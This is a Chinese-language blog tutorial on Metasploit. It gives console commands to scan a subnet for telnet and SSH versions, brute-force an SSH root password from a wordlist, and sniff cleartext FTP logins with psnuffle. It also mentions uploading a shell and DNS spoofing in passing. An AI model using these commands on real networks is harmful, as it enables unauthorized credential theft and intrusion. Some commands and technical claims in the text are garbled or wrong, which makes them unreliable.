Metasploit学习之常见的服务扫描与口令猜解
有的时候我们利用了Nmap发现了端口和服务器上的服务器,然而我们并不是专业的hack,很多时候或许我们只能破FTP 共享和telnet,虽然够低端,但是如果你已经在一个局域网中了,上面3个服务器必然会存在。
利用telnet来扫描
>search telnet_version 查找telnet扫描模块 >use auxiliary/scanner/telnet/telnet_version 使用该模块 >set RHOSTS 192.168.1.0/24 进行整个网段扫描 >set THREADS 100 设置线程,这个数值可以自己定义 >run
利用ssh来扫描
>search ssh_version 查找ssh扫描模块
>use auxiliary/scanner/telnet/ssh_version 这个版本可能是其他的
>set RHOSTS 192.168.1.0/24 进行整个网段扫描
>set THREADS 100 设置线程,这个数值可以自己定义
>run
利用services来进行扫描的方法都是大同小异,如果想利用其他的services进行扫描,可以先
>search name_version 扫描出具体支持哪些服务,当然这是个积累的过程,常用的扫描还有oracle Mssql mysql等等,当然其实很多时候我们都是在抓瞎,Nmap足以解决问题了,更多的时候我们使用这个工具就是为了后面的猜解和监听做准备,下面就讲解一些猜解方法。
SSH服务口令猜解
SSH服务器相当于windows下的FTP,我想多数管理员是不会配置密码的,因为SSH可以通过公钥配对加密和验证的,而且很难猜解,当然也许有的管理员就设置了账户密码,这样的时候我们就可以利用下面的命令进行猜解了,当然你得有一张足够大的彩虹表
>search ssh 如果熟练了可以直接敲路径了,反正我是记不住,而且模块众多,短时间很难掌握全。 >use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块 >set RHOSTS 192.168.1.105 设置hosts >set USERNAME root 设置用户名为root >set set PASS_FILE/root/password.txt 这个字典自己做啦,工具很多,好坏就在于字典了 >set THREADS 50 设置线程数,这个设置多了可能会死机,会拒绝服务,设置少了猜解会慢 >run
因为我不会拿自己的职业生涯开玩笑,所以我只在我自己搭建的环境下试验过,所以效果如何不敢评价,总是不太好吧。
FTP嗅探工具psnuffle
这个工具是嗅探明文传送的FTP的,所以所见即所得,内网破解很实用,尤其是在win系统下,如果是利用IIS搭建的FTP服务,那么你嗅探到的账户肯定具有user权限,而后怎么提权就自己想去吧,如果利用FTP软件,这个账户即使得到个人感觉用处也不大,除非可以获得写权限,这样可以上传shell.好吧,不多讲了,看下psnuffle这个绕口的工具的使用方法:
>use auxiliary/sniffer/psnuffle >run
当然你如果确定了端口也可以进行一些限制,使用set命令就好,这个嗅探可能需要开那么几个小时,因为谁也不知道啥时候会有人登陆FTP,有的时候我在局域网了,我宁愿做DNS欺骗,感觉这样更加简单暴力,当然,也许直接就被防火墙抓了,呵呵
上一篇: 桌面安全自测:你的办公桌安全吗?
下一篇: java 匿名内部类